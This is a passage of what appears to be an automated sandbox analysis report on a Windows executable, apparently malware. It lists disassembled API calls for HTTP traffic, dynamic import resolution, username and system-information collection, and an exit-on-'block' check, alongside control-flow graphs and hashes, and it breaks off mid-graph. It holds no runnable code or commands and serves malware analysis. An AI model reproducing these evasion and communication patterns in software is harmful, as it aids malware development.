                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                        • StrCmpCA.SHLWAPI(?,02EBB178), ref: 0040493A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,02EBB1B8), ref: 00404DE8
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                        • HttpOpenRequestA.WININET(00000000,02EBB0F8,?,02EBB9B8,00000000,00000000,00400100,00000000), ref: 00404B15
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                        • String ID: "$"$------$------$------
                                                        • API String ID: 2402878923-2180234286
                                                        • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                        • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                        • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                        • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocNameProcessUser
                                                        • String ID:
                                                        • API String ID: 1206570057-0
                                                        • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                        • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                        • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                        • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                        APIs
                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                        • ExitProcess.KERNEL32 ref: 0040117E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitInfoProcessSystem
                                                        • String ID:
                                                        • API String ID: 752954902-0
                                                        • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                        • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                        • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                        • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                        APIs
                                                        • GetProcAddress.KERNEL32(75550000,02E82998), ref: 00419C2D
                                                        • GetProcAddress.KERNEL32(75550000,02E829B8), ref: 00419C45
                                                        • GetProcAddress.KERNEL32(75550000,02EB6348), ref: 00419C5E
                                                        • GetProcAddress.KERNEL32(75550000,02EB6300), ref: 00419C76
                                                        • GetProcAddress.KERNEL32(75550000,02EB61E0), ref: 00419C8E
                                                        • GetProcAddress.KERNEL32(75550000,02EB6318), ref: 00419CA7
                                                        • GetProcAddress.KERNEL32(75550000,02E85B80), ref: 00419CBF
                                                        • GetProcAddress.KERNEL32(75550000,02EB61F8), ref: 00419CD7
                                                        • GetProcAddress.KERNEL32(75550000,02EB6330), ref: 00419CF0
                                                        • GetProcAddress.KERNEL32(75550000,02EB6360), ref: 00419D08
                                                        • GetProcAddress.KERNEL32(75550000,02EB6420), ref: 00419D20
                                                        • GetProcAddress.KERNEL32(75550000,02E829F8), ref: 00419D39
                                                        • GetProcAddress.KERNEL32(75550000,02E82818), ref: 00419D51
                                                        • GetProcAddress.KERNEL32(75550000,02E82A18), ref: 00419D69
                                                        • GetProcAddress.KERNEL32(75550000,02E82A38), ref: 00419D82
                                                        • GetProcAddress.KERNEL32(75550000,02EB63F0), ref: 00419D9A
                                                        • GetProcAddress.KERNEL32(75550000,02EB6438), ref: 00419DB2
                                                        • GetProcAddress.KERNEL32(75550000,02E858B0), ref: 00419DCB
                                                        • GetProcAddress.KERNEL32(75550000,02E827F8), ref: 00419DE3
                                                        • GetProcAddress.KERNEL32(75550000,02EB6450), ref: 00419DFB
                                                        • GetProcAddress.KERNEL32(75550000,02EB6468), ref: 00419E14
                                                        • GetProcAddress.KERNEL32(75550000,02EB63C0), ref: 00419E2C
                                                        • GetProcAddress.KERNEL32(75550000,02EB6408), ref: 00419E44
                                                        • GetProcAddress.KERNEL32(75550000,02E826F8), ref: 00419E5D
                                                        • GetProcAddress.KERNEL32(75550000,02EB6480), ref: 00419E75
                                                        • GetProcAddress.KERNEL32(75550000,02EB63D8), ref: 00419E8D
                                                        • GetProcAddress.KERNEL32(75550000,02EB9A28), ref: 00419EA6
                                                        • GetProcAddress.KERNEL32(75550000,02EB9A10), ref: 00419EBE
                                                        • GetProcAddress.KERNEL32(75550000,02EB99F8), ref: 00419ED6
                                                        • GetProcAddress.KERNEL32(75550000,02EB9A40), ref: 00419EEF
                                                        • GetProcAddress.KERNEL32(75550000,02EB9A58), ref: 00419F07
                                                        • GetProcAddress.KERNEL32(75550000,02EB9998), ref: 00419F1F
                                                        • GetProcAddress.KERNEL32(75550000,02EB99B0), ref: 00419F38
                                                        • GetProcAddress.KERNEL32(75550000,02E84A68), ref: 00419F50
                                                        • GetProcAddress.KERNEL32(75550000,02EB99C8), ref: 00419F68
                                                        • GetProcAddress.KERNEL32(75550000,02EB99E0), ref: 00419F81
                                                        • GetProcAddress.KERNEL32(75550000,02E82718), ref: 00419F99
                                                        • GetProcAddress.KERNEL32(75550000,02EB9698), ref: 00419FB1
                                                        • GetProcAddress.KERNEL32(75550000,02E82778), ref: 00419FCA
                                                        • GetProcAddress.KERNEL32(75550000,02EB9728), ref: 00419FE2
                                                        • GetProcAddress.KERNEL32(75550000,02EB9788), ref: 00419FFA
                                                        • GetProcAddress.KERNEL32(75550000,02E82798), ref: 0041A013
                                                        • GetProcAddress.KERNEL32(75550000,02E82338), ref: 0041A02B
                                                        • LoadLibraryA.KERNEL32(02EB9740,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                        • LoadLibraryA.KERNEL32(02EB98D8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                        • LoadLibraryA.KERNEL32(02EB9770,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                        • LoadLibraryA.KERNEL32(02EB97E8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                        • LoadLibraryA.KERNEL32(02EB9950,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                        • LoadLibraryA.KERNEL32(02EB96B0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                        • LoadLibraryA.KERNEL32(02EB9818,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                        • LoadLibraryA.KERNEL32(02EB9848,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                        • GetProcAddress.KERNEL32(75750000,02E824F8), ref: 0041A0DA
                                                        • GetProcAddress.KERNEL32(75750000,02EB9938), ref: 0041A0F2
                                                        • GetProcAddress.KERNEL32(75750000,02EB5D88), ref: 0041A10A
                                                        • GetProcAddress.KERNEL32(75750000,02EB96E0), ref: 0041A123
                                                        • GetProcAddress.KERNEL32(75750000,02E82678), ref: 0041A13B
                                                        • GetProcAddress.KERNEL32(739F0000,02E85C48), ref: 0041A160
                                                        • GetProcAddress.KERNEL32(739F0000,02E82658), ref: 0041A179
                                                        • GetProcAddress.KERNEL32(739F0000,02E85D10), ref: 0041A191
                                                        • GetProcAddress.KERNEL32(739F0000,02EB9920), ref: 0041A1A9
                                                        • GetProcAddress.KERNEL32(739F0000,02EB97D0), ref: 0041A1C2
                                                        • GetProcAddress.KERNEL32(739F0000,02E82438), ref: 0041A1DA
                                                        • GetProcAddress.KERNEL32(739F0000,02E824B8), ref: 0041A1F2
                                                        • GetProcAddress.KERNEL32(739F0000,02EB96C8), ref: 0041A20B
                                                        • GetProcAddress.KERNEL32(757E0000,02E82618), ref: 0041A22C
                                                        • GetProcAddress.KERNEL32(757E0000,02E82638), ref: 0041A244
                                                        • GetProcAddress.KERNEL32(757E0000,02EB97A0), ref: 0041A25D
                                                        • GetProcAddress.KERNEL32(757E0000,02EB9758), ref: 0041A275
                                                        • GetProcAddress.KERNEL32(757E0000,02E82458), ref: 0041A28D
                                                        • GetProcAddress.KERNEL32(758D0000,02E85A40), ref: 0041A2B3
                                                        • GetProcAddress.KERNEL32(758D0000,02E85A68), ref: 0041A2CB
                                                        • GetProcAddress.KERNEL32(758D0000,02EB98F0), ref: 0041A2E3
                                                        • GetProcAddress.KERNEL32(758D0000,02E825D8), ref: 0041A2FC
                                                        • GetProcAddress.KERNEL32(758D0000,02E823B8), ref: 0041A314
                                                        • GetProcAddress.KERNEL32(758D0000,02E85AB8), ref: 0041A32C
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB9830), ref: 0041A352
                                                        • GetProcAddress.KERNEL32(76BE0000,02E82298), ref: 0041A36A
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB5E78), ref: 0041A382
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB97B8), ref: 0041A39B
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB9968), ref: 0041A3B3
                                                        • GetProcAddress.KERNEL32(76BE0000,02E823D8), ref: 0041A3CB
                                                        • GetProcAddress.KERNEL32(76BE0000,02E82318), ref: 0041A3E4
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB9710), ref: 0041A3FC
                                                        • GetProcAddress.KERNEL32(76BE0000,02EB9800), ref: 0041A414
                                                        • GetProcAddress.KERNEL32(75670000,02E82398), ref: 0041A436
                                                        • GetProcAddress.KERNEL32(75670000,02EB9860), ref: 0041A44E
                                                        • GetProcAddress.KERNEL32(75670000,02EB9878), ref: 0041A466
                                                        • GetProcAddress.KERNEL32(75670000,02EB9908), ref: 0041A47F
                                                        • GetProcAddress.KERNEL32(75670000,02EB9890), ref: 0041A497
                                                        • GetProcAddress.KERNEL32(759D0000,02E82518), ref: 0041A4B8
                                                        • GetProcAddress.KERNEL32(759D0000,02E82578), ref: 0041A4D1
                                                        • GetProcAddress.KERNEL32(76D80000,02E82358), ref: 0041A4F2
                                                        • GetProcAddress.KERNEL32(76D80000,02EB9980), ref: 0041A50A
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E82598), ref: 0041A530
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E823F8), ref: 0041A548
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E825B8), ref: 0041A560
                                                        • GetProcAddress.KERNEL32(6F5C0000,02EB96F8), ref: 0041A579
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E825F8), ref: 0041A591
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E82478), ref: 0041A5A9
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E82378), ref: 0041A5C2
                                                        • GetProcAddress.KERNEL32(6F5C0000,02E82418), ref: 0041A5DA
                                                        • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 0041A5F1
                                                        • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 0041A607
                                                        • GetProcAddress.KERNEL32(75480000,02EB98A8), ref: 0041A629
                                                        • GetProcAddress.KERNEL32(75480000,02EB5DA8), ref: 0041A641
                                                        • GetProcAddress.KERNEL32(75480000,02EB98C0), ref: 0041A659
                                                        • GetProcAddress.KERNEL32(75480000,02EBA0D0), ref: 0041A672
                                                        • GetProcAddress.KERNEL32(753B0000,02E822B8), ref: 0041A693
                                                        • GetProcAddress.KERNEL32(6FF00000,02EBA160), ref: 0041A6B4
                                                        • GetProcAddress.KERNEL32(6FF00000,02E824D8), ref: 0041A6CD
                                                        • GetProcAddress.KERNEL32(6FF00000,02EBA100), ref: 0041A6E5
                                                        • GetProcAddress.KERNEL32(6FF00000,02EBA178), ref: 0041A6FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: HttpQueryInfoA$InternetSetOptionA$P2Wu$1Wu
                                                        • API String ID: 2238633743-1110339542
                                                        • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                        • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                        • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                        • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1016 40635a 1012->1016 1017 40634e-406358 1012->1017 1013->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1013 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1029 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1029 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                        • StrCmpCA.SHLWAPI(?,02EBB178), ref: 00406303
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                        • HttpOpenRequestA.WININET(00000000,GET,?,02EBB9B8,00000000,00000000,00400100,00000000), ref: 00406385
                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                        • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                        • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                        • String ID: ERROR$ERROR$GET
                                                        • API String ID: 3074848878-2509457195
                                                        • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                        • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                        • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                        • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1068 411817-41181a 1067->1068 1069 41199e-4119bd strtok_s 1067->1069 1071 411821-411830 call 41a820 1068->1071 1072 411849-411858 call 41a820 1068->1072 1073 4118ad-4118be StrCmpCA 1068->1073 1074 4118cf-4118e0 StrCmpCA 1068->1074 1075 41198f-411999 call 41a820 1068->1075 1076 4118f1-411902 StrCmpCA 1068->1076 1077 411951-411962 StrCmpCA 1068->1077 1078 411970-411981 StrCmpCA 1068->1078 1079 411913-411924 StrCmpCA 1068->1079 1080 411932-411943 StrCmpCA 1068->1080 1081 411835-411844 call 41a820 1068->1081 1082 41185d-41186e StrCmpCA 1068->1082 1083 41187f-411890 StrCmpCA 1068->1083 1069->1065 1071->1069 1072->1069 1085 4118c0-4118c3 1073->1085 1086 4118ca 1073->1086 1087 4118e2-4118e5 1074->1087 1088 4118ec 1074->1088 1075->1069 1089 411904-411907 1076->1089 1090 41190e 1076->1090 1095 411964-411967 1077->1095 1096 41196e 1077->1096 1098 411983-411986 1078->1098 1099 41198d 1078->1099 1091 411930 1079->1091 1092 411926-411929 1079->1092 1093 411945-411948 1080->1093 1094 41194f 1080->1094 1081->1069 1103 411870-411873 1082->1103 1104 41187a 1082->1104 1105 411892-41189c 1083->1105 1106 41189e-4118a1 1083->1106 1085->1086 1086->1069 1087->1088 1088->1069 1089->1090 1090->1069 1091->1069 1092->1091 1093->1094 1094->1069 1095->1096 1096->1069 1098->1099 1099->1069 1103->1104 1104->1069 1107 4118a8 1105->1107 1106->1107 1107->1069
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcessstrtok_s
                                                        • String ID: block
                                                        • API String ID: 3407564107-2199623458
                                                        • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                        • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                        • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                        • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1144 4155bb-4155d2 call 41a8a0 call 41a800 1128->1144 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1144->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1290 415ac3-415ac6 1160->1290 1163 4157da-41585f call 41aad0 StrCmpCA 1161->1163 1164 4156bc-4156c3 1161->1164 1183 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1163->1183 1184 415865-41586c 1163->1184 1167 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1164->1167 1168 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1164->1168 1167->1163 1168->1163 1266 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1168->1266 1183->1290 1189 415872-415879 1184->1189 1190 41598f-415a14 call 41aad0 StrCmpCA 1184->1190 1196 